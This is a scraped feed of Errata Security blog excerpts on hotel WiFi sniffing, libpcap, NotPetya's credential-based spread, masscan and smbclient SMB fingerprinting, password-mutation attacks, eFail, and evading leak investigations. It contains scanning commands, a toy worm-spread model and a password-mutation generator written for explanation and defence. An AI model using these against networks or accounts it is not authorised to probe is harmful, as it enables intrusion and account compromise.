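    """Decode a 28-byte Ethernet/IPv4 ARP body (RFC 826 layout)."""
    htype, ptype, hlen, plen, oper = struct.unpack_from("!HHBBH", body, 0)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not Ethernet/IPv4 ARP")
    return {
        "op": {1: "who-has", 2: "is-at"}.get(oper, oper),
        "sender_mac": ":".join(f"{b:02x}" for b in body[8:14]),
        "sender_ip": ".".join(str(b) for b in body[14:18]),
        "target_ip": ".".join(str(b) for b in body[24:28]),
    }

# Synthetic "who-has 10.10.0.1 tell 10.10.4.2" request, like a guest
# device ARPing for the hotel's router (the MAC is made up):
body = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)        # header, oper=request
body += bytes.fromhex("020000aabbcc") + bytes([10, 10, 4, 2])  # sender MAC/IP
body += bytes(6) + bytes([10, 10, 0, 1])                # target MAC unknown, target IP
info = parse_arp(body)
```

In a real capture the 802.11 header in front of this body carries the three MAC addresses discussed below, which is what exposes the bridging.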
We can see this in the raw ARP packets, such as the one shown below:WiFi packets have three MAC addresses, the source and destination (as expected) and also the address of the access-point involved. The access point is the actual transmitter, but it's bridging the packet from some other location on the local Ethernet network.Apparently, CAESARS dumps all the guests into the address range 10.10.x.x, all going out through the router 10.10.0.1. We can see this from the ARP traffic, as everyone seems to be ARPing that router.I'm probably seeing all the devices on the CAESARS WiFi. In ot]]> 2018-08-07T23:18:45+00:00 https://blog.erratasec.com/2018/08/what-caesars-defcon-wifi-situation.html www.secnews.physaphae.fr/article.php?IdArticle=770525 False Patching None None Errata Security - Errata Security Some changes in how libpcap works you should know Traditionally, you'd open an adapter with pcap_open(), whose function parameters set options like snap length, promiscuous mode, and timeouts.However, in newer versions of the API, what you should do instead is call pcap_create(), then set the options individually with calls to functions like pcap_set_timeout(), then once you are ready to start capturing, call pcap_activate().I mention this in relation to "TPACKET" and pcap_set_immediate_mode().Over the years, Linux has been adding a "ring buffer" mode to packet capture. This is a trick where a packet buffer is memory mapped between user-space and kernel-space. It allows a packet-sniffer to pull packets out of the driver without the overhead of extra copies or system calls that cause a user-kernel space transition. This has gone through several generations.One of the latest generations causes the pcap_next() function to wait forever for a packet. This happens a lot on virtual machines where there is no background traffic on the network.This looks like a bug, but maybe it isn't.  It's unclear what the "timeout" parameter actually means. 
I've been hunting down the documentation, and curiously, it's not really described anywhere. For an ancient, popular API, libpcap is almost entirely undocumented as to what it precisely does. I've tried reading some of the code, but I'm not sure I've come to any understanding.In any case, the way to resolve this is to call the function pcap_set_immediate_mode(). This causes libpcap to back off and use an older version of TPACKET such that it works as expected: even on silent networks, the pcap_next() function will time out and return.I mention this because I fixed this bug in my code. When running inside a VM, my program would never exit. I changed from pcap_open_live() to the pcap_create()/pcap_activate() method instead, adding the setting of "immediate mode", and now things work. Performance seems roughly the same as far as I can tell.I'm still not certain what's going on here, and there are even newer proposed zero-copy/ring-buffer modes being added to the Linux kernel, so this can change in the future. But in any case, I thought I'd document this in a blogpost in order to help out others who might be encountering the same problem.]]> 2018-07-27T16:55:05+00:00 https://blog.erratasec.com/2018/07/some-changes-in-how-libpcap-works-you.html www.secnews.physaphae.fr/article.php?IdArticle=757269 False None None None Errata Security - Errata Security Your IoT security concerns are stupid recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question.Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten.
For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small but manageable, constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, its primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.Such technical analysis of events like Mirai and notPetya is ignored. Policymakers are only cherry-picking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted.
Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzhen now look very different, having less Internet exposure than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100 billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4 billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.Lastly, focusing on the ven]]> 2018-07-12T19:54:20+00:00 https://blog.erratasec.com/2018/07/your-iot-security-concerns-are-stupid.html www.secnews.physaphae.fr/article.php?IdArticle=742946 False Hack,Patching,Guideline NotPetya None Errata Security - Errata Security Lessons from nPetya one year later An example is this quote in a recent article:"One year on from NotPetya, it seems lessons still haven't been learned. A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains." This is an attractive claim. It describes the problem in terms of people being "weak" and that the solution is to be "strong". If only organizations were strong enough, willing to deal with downtime and disruption, then problems like this wouldn't happen.But this is wrong, at least in the case of NotPetya.NotPetya's spread was initiated through the Ukrainian company MeDoc, which provided tax accounting software. It had an auto-update process for keeping its software up-to-date. This was subverted in order to deliver the initial NotPetya infection.
Patching had nothing to do with this. Other common security controls like firewalls were also bypassed.Auto-updates and cloud-management of software and IoT devices are becoming the norm. This creates a danger for such "supply chain" attacks, where the supplier of the product gets compromised, spreading an infection to all their customers. The lesson organizations need to learn about this is how such infections can be contained. One way is to firewall such products away from the core network. Another solution is port-isolation/microsegmentation, which limits the spread after an initial infection.Once NotPetya got into an organization, it spread laterally. The chief way it did this was through Mimikatz/PsExec, reusing Windows credentials. It stole whatever login information it could get from the infected machine and used it to try to log on to other Windows machines. If it got lucky getting domain administrator credentials, it then spread to the entire Windows domain. This was the primary method of spreading, not the unpatched ETERNALBLUE vulnerability. This is why it was so devastating to companies like Maersk: it wasn't a matter of a few unpatched systems getting infected, it was a matter of losing entire domains, including the backup systems.Such spreading through Windows credentials continues to plague organizations. A good example is the recent ransomware infection of the City of Atlanta that spread much the same way. The limits of the worm were the limits of domain trust relationships. For example, it didn't infect the city airport because that Windows domain is separate from the city's domains.This is the most pressing lesson organizations need to learn, the one they are ignoring. They need to do more to prevent desktops from infecting each other, such as through port-isolation/microsegmentation. They need to control the spread of administrative credentials within the organization.
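That credential-driven lateral movement is easy to model; here is a toy sketch (the hosts and credentials are entirely synthetic, and the real thing uses Mimikatz/PsExec, not Python):

```python
def spread(start, creds_on, accepts):
    """Toy worm: harvest credentials from infected hosts, try them everywhere."""
    infected, harvested = {start}, set()
    changed = True
    while changed:
        changed = False
        for host in list(infected):
            new = creds_on.get(host, set()) - harvested  # steal what's cached here
            if new:
                harvested |= new
                changed = True
        for host, valid in accepts.items():
            if host not in infected and harvested & valid:  # any stolen cred works
                infected.add(host)
                changed = True
    return infected

# Same local-admin password on every workstation, plus a domain admin who
# logged into ws2; the airport domain shares no credentials, so it survives:
creds_on = {"ws1": {"localadmin"}, "ws2": {"localadmin", "domainadmin"}}
accepts = {"ws1": {"localadmin"}, "ws2": {"localadmin"},
           "dc": {"domainadmin"}, "airport": {"airport-admin"}}
owned = spread("ws1", creds_on, accepts)
```

The fixpoint is exactly the reachable credential-sharing cluster, which is why separate domains with separate credentials (like the airport in the Atlanta example) act as a firebreak.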
A lot of organizations put the same local admin account on every workstation, which makes the spread of NotPetya-style worms trivial. They need to reevaluate trust relationships between domains, so that the admin of one can't infect the others.These solutions are difficult, which is why news articles don't mention them. You don't have to know anything about security to proclaim "the problem is lack of patches". It's moral authority, chastising the weak, rather than a prescription of what to do. Solving supply chain hacks and Windows credential sharing, though, is hard. I don't know any universal solution to this -- I'd have to thoroughly analyze your network and business in order to ]]> 2018-06-27T15:49:15+00:00 https://blog.erratasec.com/2018/06/lessons-from-npetya-one-year-later.html www.secnews.physaphae.fr/article.php?IdArticle=725976 False Ransomware,Malware,Patching NotPetya,FedEx,Wannacry None Errata Security - Errata Security SMB version detection in masscan For example, running masscan in my local bar, I get the following result:Banner on port 445/tcp on 10.1.10.200: [smb] SMBv1  time=2018-06-24 22:18:13 TZ=+240  domain=SHIPBARBO version=6.1.7601 ntlm-ver=15 domain=SHIPBARBO name=SHIPBARBO domain-dns=SHIPBARBO name-dns=SHIPBARBO os=Windows Embedded Standard 7601 Service Pack 1 ver=Windows Embedded Standard 6.1The top version string comes from NTLMSSP, with 6.1.7601, which means Windows 6.1 (Win7) build number 7601. The bottom version string comes from the SMBv1 packets, which consist of strings.The nmap and smbclient programs will get the SMBv1 part, but not the NTLMSSP part.This seems to be a problem with Rapid7's "National Exposure Index", which tracks SMB exposure (amongst other things). It's missing about 300,000 machines that report NT_STATUS_ACCESS_DENIED from smbclient rather than the numeric version info from NTLMSSP authentication.The smbclient output does have this information internally.
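Extracting that 6.1.7601 from the NTLMSSP exchange is a fixed-offset parse of the CHALLENGE message; here is a hedged sketch against a synthetic message (field offsets per Microsoft's MS-NLMP spec; this is an illustration, not masscan's actual code):

```python
import struct

NEGOTIATE_VERSION = 0x02000000  # flag meaning the Version field is populated

def ntlm_version(msg):
    """Pull ProductMajor.ProductMinor.ProductBuild from an NTLMSSP CHALLENGE."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE message")
    flags, = struct.unpack_from("<I", msg, 20)   # NegotiateFlags
    if not flags & NEGOTIATE_VERSION:
        return None                              # server didn't advertise a version
    major, minor, build = struct.unpack_from("<BBH", msg, 48)  # VERSION structure
    return f"{major}.{minor}.{build}"

# Synthetic CHALLENGE advertising Windows 6.1 build 7601 (the Win7 box above);
# the server-challenge and target fields are left zeroed for brevity:
msg = bytearray(56)
msg[:8] = b"NTLMSSP\x00"
struct.pack_into("<I", msg, 8, 2)                   # MessageType = CHALLENGE
struct.pack_into("<I", msg, 20, NEGOTIATE_VERSION)  # NegotiateFlags
struct.pack_into("<BBH", msg, 48, 6, 1, 7601)       # Version: 6.1.7601
ver = ntlm_version(bytes(msg))
```

This is why the NTLMSSP number survives even when smbclient only reports NT_STATUS_ACCESS_DENIED: the version rides in the authentication handshake itself, before any access check.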
For example, you could run the following command to put the debug level at '10' to grab it:$ smbclient -U "" -N -L 10.1.10.95 -d10You'll get something like the following output:It appears to get the Windows 6.1 numbers, though for some reason it's missing the build number.To run masscan to grab this, run:# masscan --banners -p445 10.1.10.95 --hello smbv1In the above example, I also used the "--hello smbv1" parameter, to grab both the SMBv1 and NTLMSSP version info. Otherwise, it'll default to SMBv2 if available, and only return:]]> 2018-06-24T19:39:21+00:00 https://blog.erratasec.com/2018/06/smb-version-detection-in-masscan.html www.secnews.physaphae.fr/article.php?IdArticle=720967 False Tool None None Errata Security - Errata Security Notes on "The President is Missing" This "news analysis" piece in the New York Times is a good example, coming up with policy recommendations based on fictional cliches rather than a reality of what hackers do.The cybervirus in the book is some all-powerful thing, able to infect everything everywhere without being detected. This is fantasy no more real than magic and faeries. Sure, magical faeries are a popular basis for fiction, but in this case, it's lazy fantasy, a cliche. In fiction, viruses are rarely portrayed as anything other than all-powerful.But in the real world, viruses have important limitations. If you knew anything about computer viruses, rather than being impressed by what they can do, you'd be disappointed by what they can't.Go look at your home router. See the blinky lights. The light flashes every time a packet of data goes across the network. Packets can't be sent without a light blinking. Likewise, viruses cannot spread themselves over a network, or communicate with each other, without somebody noticing -- especially a virus that's supposedly infected a billion devices as in the book.The same is true of data on the disk. All the data is accounted for.
It's rather easy for professionals to see when data (consisting of the virus) has been added. The difficulty of anti-virus software is not in detecting when something new has been added to a system, but automatically determining whether it's benign or malicious. When viruses are able to evade anti-virus detection, it's because they've been classified as non-hostile, not because they are invisible.Such evasion only works when hackers have a focused target. As soon as a virus spreads too far, anti-virus companies will get a sample, classify as malicious, and spread the "signatures" out to the world. That's what happened with Stuxnet, a focused attack on Iran's nuclear enrichment program that eventually spread too far and got detected. It's implausible that anything can spread to a billion systems without anti-virus companies getting a sample and correctly classifying it.In the book, the president creates a team of the 30 brightest cybersecurity minds the country has, from government, the private sector, and even convicted hackers on parole from jail -- each more brilliant than the last. This is yet another lazy cliche about genius hackers.The cliche comes from the fact that it's rather easy to impress muggles with magic tricks. As soon as somebody shows an ability to do something you don't know how to do, they become a cyber genius in your mind. The reality is that cybersecurity/hacking is no different than any other profession, no more dominated by "genius" than bridge engineering or heart surgery. It's a skill that takes both years of study as well as years of experience.So whenever the president, ignorant of computers, puts together a team of 30 cyber geniuses, they aren't going to be people of competence. They are going to be people good at promoting themselves, taking credit for other people's work, or political engineering. 
They won't be technical experts, they'll be people like Rudy Giuliani or Richard Clarke, who have been tapped by presidents as cyber experts despite knowing less than nothing about computers.A funny example of this is Marcus Hutchins. He's a virus researcher of typical skill and experience, but was catapulted to fame by finding the "kill switch" in the famous Wannacry virus. In truth, he just got lucky, being the first to find the kill switch that would've soon been found by ano]]> 2018-06-17T01:45:55+00:00 https://blog.erratasec.com/2018/06/notes-on-president-is-missing.html www.secnews.physaphae.fr/article.php?IdArticle=708628 False None Wannacry None Errata Security - Errata Security The First Lady's bad cyber advice help children go online safely. It has problems.Melania's guide is full of outdated, impractical, inappropriate, and redundant information. But that's allowed, because it relies upon moral authority: to be moral is to be secure, to be moral is to do what the government tells you. It matters less whether the advice is technically accurate, and more that you are supposed to do what authority tells you.That's a problem, not just with her guide, but with most cybersecurity advice in general. Our community gives out advice without putting much thought into it, because it doesn't need thought. You should do what we tell you, because being secure is your moral duty.This post picks apart Melania's document. The purpose isn't to fine-tune her guide and make it better. Instead, the purpose is to demonstrate the idea of resting on moral authority instead of technical authority.Strong Passwords"Strong passwords" is the quintessential cybersecurity cliché that insecurity is due to some "weakness" (laziness, ignorance, greed, etc.) and the remedy is to be "strong".The first flaw is that this advice is outdated. Ten years ago, important websites would frequently get hacked and have poor password protection (like MD5 hashing).
Back then, strength mattered, to stop hackers from brute force guessing the hacked passwords. These days, important websites get hacked less often and protect the passwords better (like salted bcrypt). Moreover, the advice is now often redundant: websites, at least the important ones, enforce a certain level of password complexity, so that even without advice, you'll be forced to do the right thing most of the time.This advice is outdated for a second reason: hackers have gotten a lot better at cracking passwords. Ten years ago, they focused on brute force, trying all possible combinations. Partly because passwords are now protected better, dramatically reducing the effectiveness of the brute force approach, hackers have had to focus on other techniques, such as the mutated dictionary and Markov chain attacks. Consequently, even though "Password123!" seems to meet the above criteria of a strong password, it'll fall quickly to a mutated dictionary attack. The simple recommendation of "strong passwords" is no longer sufficient.The last part of the above advice is to avoid password reuse. This is good advice. However, this becomes impractical advice, especially when the user is trying to create "strong" complex passwords as described above. There's no way users/children can remember that many passwords. So they aren't going to follow that advice.To make the advice work, you need to help users with this problem. To begin with, you need to tell them to write down all their passwords. This is something many people avoid, because they've been told to be "strong" and writing down passwords seems "weak". Indeed it is, if you write them down in an office environment and stick them on a note on the monitor or underneath the keyboard. But they are safe and strong if it's on paper stored in your home safe, or even in a home office drawer. 
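The mutated-dictionary attack mentioned above is simple to demonstrate: a handful of mechanical rules applied to a small wordlist already covers passwords that look "strong" on paper (the rules and wordlist here are toy illustrations):

```python
def mutations(word):
    """Yield common human mutations of a dictionary word (toy rule set)."""
    leet = str.maketrans("aeios", "43105")  # a->4, e->3, i->1, o->0, s->5
    bases = {word, word.capitalize(), word.upper(), word.translate(leet)}
    for base in bases:
        for suffix in ("", "1", "123", "!", "123!", "2018"):
            yield base + suffix

# "Password123!" passes most complexity checkers, yet it's just
# capitalize("password") plus a popular suffix:
candidates = set(mutations("password"))
```

Real cracking tools ship far richer rule sets than this; the point is only that capitalization-plus-suffix "strength" is mechanical to enumerate.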
I write my passwords on the margins in a …

(Published 2018-05-31, https://blog.erratasec.com/2018/05/the-first-ladys-bad-cyber-advice.html)

Errata Security - The devil wears Pravda

Musk has a point. Journalists do suck, and many suck consistently. I see this in my own industry, cybersecurity, and I frequently criticize them for their suckage.

But what he's doing here is not correcting them when they make mistakes (or what Musk sees as mistakes), but questioning their legitimacy. This legitimacy isn't measured by whether they follow established journalism ethics, but by whether their "core truths" agree with Musk's "core truths".

An example of the problem is how the press fixates on Tesla car crashes due to its "autopilot" feature. Pretty much every autopilot crash makes national headlines, while the press ignores the other 40,000 car crashes that happen in the United States each year. Musk spies on Tesla drivers (hello, classic Bond villain everyone) so he can see the dip in autopilot usage every time such a news story breaks. He's got good reason to be concerned about this.

He argues that autopilot is safer than humans driving, and he's got the statistics and government studies to back this up. Therefore, the press's fixation on Tesla crashes is illegitimate "fake news", titillating the audience with distorted truth.

But here's the thing: that's still only Musk's version of the truth. Yes, on a mile-per-mile basis, autopilot is safer, but there's nuance here. Autopilot is used primarily on freeways, which already have a low mile-per-mile accident rate. People choose autopilot only when conditions are incredibly safe and drivers are unlikely to have an accident anyway. Musk is therefore being intentionally deceptive, comparing apples to oranges.
Autopilot may still be safer; it's just that the numbers Musk uses don't demonstrate this.

And then there's the issue of calling it "autopilot" to begin with, because it isn't one. The public is overrating the capabilities of the feature. It's little different than the "lane keeping" and "adaptive cruise control" you can now find in other cars. In many ways, the technology is behind -- my Tesla doesn't beep at me when a pedestrian walks behind my car while backing up, but virtually every new car on the market does.

Yes, the press unduly covers Tesla autopilot crashes, but Musk has only himself to blame, by unduly exaggerating his car's capabilities by calling them "autopilot".

What's "core truth" is thus rather difficult to obtain. What the press satisfies itself with instead is smaller truths, what they can document. In such cases the facts are that the accident happened, and they try to get Tesla or Musk to comment on it.

What you can criticize a journalist for is therefore not "core truth" but whether they did journalism correctly. When such stories criticize "autopilot" but don't do their diligence in getting Tesla's side of the story, that's a violation of journalistic practice. When I criticize journalists for their poor handling of stories in my industry, I try to focus on which journalistic principles they get wrong. For example, the NYTimes reporters do a lot of stories quoting anonymous government sources in clear violation of journalistic principles.

If "credibility" is the concern, then it's the classic Bond villain h…

(Published 2018-05-23, https://blog.erratasec.com/2018/05/the-devil-wears-pravda.html)

Errata Security - C is too low level

x86 machine code is a high-level language, but this article claiming that C is not a low-level language is bunk. C certainly has some problems, but it's still the closest language to assembly.
This is obvious from the fact that it's still the fastest compiled language. What we see is a typical academic out of touch with the real world.

The author makes the (wrong) observation that we've been stuck emulating the PDP-11 for the past 40 years. C was written for the PDP-11, and since then CPUs have been designed to make C run faster. The author imagines a different world, such as one where CPU designers instead target something like LISP as their preferred language, or Erlang. This misunderstands the state of the market. CPUs do indeed support lots of different abstractions, and C has evolved to accommodate this.

The author criticizes things like "out-of-order" execution, which has led to the Spectre side-channel vulnerabilities. Out-of-order execution is necessary to make C run faster. The author claims instead that those resources should be spent on having more, slower CPUs with more threads. This sacrifices single-threaded performance in exchange for a lot more threads executing in parallel. The author cites Sparc Tx CPUs as his ideal processor.

But here's the thing: the Sparc Tx was a failure. To be fair, it's mostly a failure because most of the time, people wanted to run old C code instead of new Erlang code. But it was still a failure at running Erlang.

Time after time, engineers keep finding that "out-of-order", single-threaded performance is still the winner. A good example is ARM processors for both mobile phones and servers. All the theory points to in-order CPUs as being better, but all the products are out-of-order, because the theory is wrong. The custom ARM cores from Apple and Qualcomm used in most high-end phones are so deeply out-of-order they give Intel CPUs competition. The same is true on the server front with the latest Qualcomm Centriq and Cavium ThunderX2 processors, deeply out-of-order, supporting more than 100 instructions in flight.

The Cavium is especially telling.
Its ThunderX CPU had 48 simple cores, which it replaced with the ThunderX2's 32 complex, deeply out-of-order cores. The performance increase was massive, even on multithread-friendly workloads. Every competitor to Intel's dominance in the server space has learned the lesson of the Sparc Tx: many wimpy cores is a failure; you need fewer beefy cores. Yes, they don't need to be as beefy as Intel's processors, but they need to be close.

Even Intel's "Xeon Phi" custom chip learned this lesson. This is their GPU-like chip, running 60 cores with 512-bit wide "vector" (sic) instructions, designed for supercomputer applications. Its first version was purely in-order. Its current version is slightly out-of-order. It supports four threads and focuses on basic number crunching, so in-order cores would seem to be the right approach, but Intel found that even in this case out-of-order processing still provided a benefit. Practice is different from theory.

As an academic, the author of the above article focuses on abstractions. The criticism of C is that it has the wrong abstractions, which are hard to optimize, and that if we instead expressed things in the right abstractions, it would be easier to optimize.

This is an intellectually compelling argument, but so far bunk.

The reason is that while the theoretical base language has issues, everyone programs using extensions to the language, like "intrinsics" (C 'functions' that map to assembly instructions). Programmers write libraries using these intrinsics, which the rest of the normal programmers then use. In other words, if your criticism is that C is not itself low level enough …

(Published 2018-05-23, https://blog.erratasec.com/2018/05/c-is-too-low-level.html)

Errata Security - masscan, macOS, and firewall

Note that we are talking about the "packet-filter" firewall feature here.
Remember that macOS, like most operating systems these days, has two separate firewalls: an application firewall and a packet-filter firewall. The application firewall is the one you see in System Settings labeled "Firewall", and it controls things based upon the application's identity rather than by which ports it uses. This is normally "on" by default. The packet-filter is normally "off" by default and is of little use to normal users.

Also note that macOS changed packet-filters around version 10.10.5 ("Yosemite", October 2014). The older one is known as "ipfw", which was the default firewall for FreeBSD (much of macOS is based on FreeBSD). The replacement is known as PF, which comes from OpenBSD. Whereas you used to use the old "ipfw" command on the command line, you now use the "pfctl" command, as well as the "/etc/pf.conf" configuration file.

What we need to filter is the source port of the packets that masscan will send, so that when replies are received, they won't reach the operating-system stack but will instead go to masscan. To do this, we need to find a range of ports that won't conflict with the operating system. Namely, when the operating system creates outgoing connections, it randomly chooses a source port within a certain range. We want masscan to use source ports in a different range.

To figure out the range macOS uses, we run the following command:

    sysctl net.inet.ip.portrange.first net.inet.ip.portrange.last

On my laptop, which is probably the default for macOS, I get the following range. Sniffing with Wireshark confirms this is the range used for source ports for outgoing connections.

    net.inet.ip.portrange.first: 49152
    net.inet.ip.portrange.last: 65535

So this means I shouldn't use source ports anywhere in the range 49152 to 65535. On my laptop, I've decided to have masscan use the ports 40000 to 41023.
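The constraint described above can be sanity-checked with a short script: the chosen masscan range must not overlap the OS's ephemeral port range, and (as noted below) its size must be a power of two. The range bounds are the sysctl values from my laptop; substitute your own.

```python
def range_ok(first: int, last: int, os_first: int, os_last: int) -> bool:
    """Check a masscan --source-port range: its size must be a power
    of two, and it must not overlap the OS's ephemeral port range."""
    size = last - first + 1
    power_of_two = size > 0 and (size & (size - 1)) == 0
    no_overlap = last < os_first or first > os_last
    return power_of_two and no_overlap

# Values reported by `sysctl net.inet.ip.portrange.first ...` on my laptop:
OS_FIRST, OS_LAST = 49152, 65535

print(range_ok(40000, 41023, OS_FIRST, OS_LAST))  # True: 1024 ports, below 49152
print(range_ok(49000, 50023, OS_FIRST, OS_LAST))  # False: overlaps the OS range
```

The power-of-two check uses the standard bit trick: a value n is a power of two exactly when n & (n - 1) is zero.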
The range masscan uses must be a power of 2, so here I'm using 1024 (two to the tenth power).

To configure masscan, I can either type the parameter "--source-port 40000-41023" every time I run the program, or I can add the following line to /etc/masscan/masscan.conf. Remember that by default, masscan will look in that configuration file for any configuration parameters, so you don't have to keep retyping them on the command line.

    source-port = 40000-41023

Next, I need to add the following firewall rule to the bottom of /etc/pf.conf:

    block in proto tcp from any to any port 40000 >< 41024

However, we aren't do…

(Published 2018-05-20, https://blog.erratasec.com/2018/05/masscan-macos-and-firewall.html)

Errata Security - Some notes on eFail

Disable remote/external content in email

The most important defense is to disable "external" or "remote" content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when senders want to display images without filling up the email with them. But most of the time it is illegitimate: they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and that the width/height of the image is set to one pixel, so you don't even see it.

Such trackers are so pernicious that they are disabled by default in most email clients, as in the settings in Thunderbird, for example. The problem is that as you read email messages, you often get frustrated by the error messages and missing content, so you keep adding exceptions.

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least no HTTP exceptions.
HTTPS exceptions (those using SSL) are okay as long as they aren't to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn't matter whether they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That's probably overkill. As long as the attacker can't use the "remote content" in emails, you are fine. Likewise, some have recommended disabling HTML completely. That's not even an option in any email client I've used -- you can disable sending HTML emails, but not receiving them. It's sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn't replicate the direct exfiltration

There are two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like …

(Published 2018-05-14, https://blog.erratasec.com/2018/05/some-notes-on-efail.html)

Errata Security - How to leak securely, for White House staffers

… guy assigned to crack down on unauthorized White House leaks. It's necessarily light on technical details, so I thought I'd write up some guesses, either as a guide for future reporters asking questions, or for people who want to know how they can safely leak information.

It should come as no surprise that your work email and phone are already monitored. They can get every email you've sent or received, even if you've deleted it. They can get every text message you've sent or received, the metadata of every phone call sent or received, and so forth.

To a lesser extent, this also applies to your well-known personal phone and email accounts. Law enforcement can get the metadata (which includes text messages) for these things without a warrant.
In the above story, the person doing the investigation wasn't law enforcement, but I'm not sure that's a significant barrier if they can pass things on to the Secret Service or something.

The danger here isn't that you used these things to leak; it's that you've used these things to converse with the reporter before you made the decision to leak. That's what happened in the Reality Winner case: she communicated with The Intercept before she allegedly leaked a printed document to them via postal mail. While it wasn't conclusive enough to convict her, the innocent emails certainly put the investigators on her trail.

The path to leaking often starts this way: innocent actions, before the decision to leak was made, that come back to haunt the person afterwards. That includes emails. That also includes Google searches. That includes websites you visit (like this one). I'm not sure how to solve this, except that if you've been in contact with The Intercept and then decide to leak, send it to anybody but The Intercept.

By the way, the other thing that caught Reality Winner was the records they had of her accessing files and printing them on a printer. Depending on where you work, they may have a record of every file you've accessed and every intranet page you've visited. Because of the way printers put secret dots on documents, investigators knew precisely which printer printed the document leaked to The Intercept, and when.

Photographs suffer the same problem: your camera and phone tag photographs with GPS coordinates and the time the photograph was taken, as well as information about the camera. This accidentally exposed John McAfee's hiding location when Vice took pictures of him a few years ago. Some people leak by taking pictures of the screen -- use a camera without GPS for this (meaning, a really old camera you bought from a pawnshop).

These examples should impress upon you the dangers of not understanding technology.
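The photo-metadata problem described above is easy to check for: in a JPEG, EXIF data (including any GPS tags) lives in an APP1 segment whose payload starts with the bytes "Exif". A minimal, stdlib-only sketch that detects whether such a segment is present (real tools like exiftool go further and parse the actual GPS tags); the two sample byte strings at the bottom are synthetic, not real photos:

```python
def has_exif(jpeg_bytes: bytes) -> bool:
    """Walk JPEG segments looking for an APP1/Exif block, which is
    where cameras store GPS coordinates, timestamps, and camera info."""
    if jpeg_bytes[:2] != b"\xff\xd8":  # missing SOI marker: not a JPEG
        return False
    i = 2
    while i + 4 <= len(jpeg_bytes):
        if jpeg_bytes[i] != 0xFF:
            break
        marker = jpeg_bytes[i + 1]
        if marker == 0xE1 and jpeg_bytes[i + 4 : i + 8] == b"Exif":
            return True                 # APP1 segment carrying EXIF
        length = int.from_bytes(jpeg_bytes[i + 2 : i + 4], "big")
        i += 2 + length                 # skip to the next segment
    return False

# Synthetic examples: one plain segment, one APP1/Exif segment.
plain = b"\xff\xd8" + b"\xff\xdb" + (67).to_bytes(2, "big") + b"\x00" * 65
tagged = (b"\xff\xd8" + b"\xff\xe1" + (30).to_bytes(2, "big")
          + b"Exif\x00\x00" + b"\x00" * 22)
print(has_exif(plain))   # False
print(has_exif(tagged))  # True
```

Stripping the metadata before leaking a photo means removing that APP1 segment entirely, which is what "remove EXIF" tools do.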
As soon as you do something to evade surveillance you know about, you may get caught by surveillance you don't know about.

If you nonetheless want to continue forward, the next step may be to get a "burner phone". You can get an adequate Android "prepaid" phone for cash at the local Walmart, electronics store, or phone store.

There are some problems with such phones, though. They can often be tracked back to the store that sold them, and the store will have security cameras that recorded you making the purchase. License-plate readers and GPS tracking on your existing phone may also place you at that Walmart.

I don't know how to resolve these problems. Perhaps the best is to grow a beard and, on the last day of your vacation, color your hair, take a long bike/metro ride (without y…

(Published 2018-05-13, https://blog.erratasec.com/2018/05/how-to-leak-securely-for-white-house.html)

Errata Security - No, Ray Ozzie hasn't solved crypto backdoors

Ray Ozzie may have a solution to the crypto backdoor problem. No, he hasn't. He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors; we just don't know how to secure them.

The vault doesn't scale

Yes, Apple has a vault where they've successfully protected important keys. No, it doesn't mean this vault scales. The more people there are, and the more often you have to touch the vault, the less secure it becomes. We are talking thousands of requests per day from 100,000 different law enforcement agencies around the world. We are unlikely to protect this against incompetence and mistakes. We are definitely unable to secure this against deliberate attack.

A good analogy to Ozzie's solution is LetsEncrypt for getting SSL certificates for your website, which is fairly scalable, using a private key locked in a vault for signing hundreds of thousands of certificates.
That this scales seems to validate Ozzie's proposal.

But at the same time, LetsEncrypt is easily subverted. LetsEncrypt uses DNS to verify your identity. But spoofing DNS is easy, as was shown in the recent BGP attack against a cryptocurrency. Attackers can create fraudulent SSL certificates with enough effort. We've got other protections against this, such as discovering and revoking the bad SSL certificate, so while damaging, it's not catastrophic.

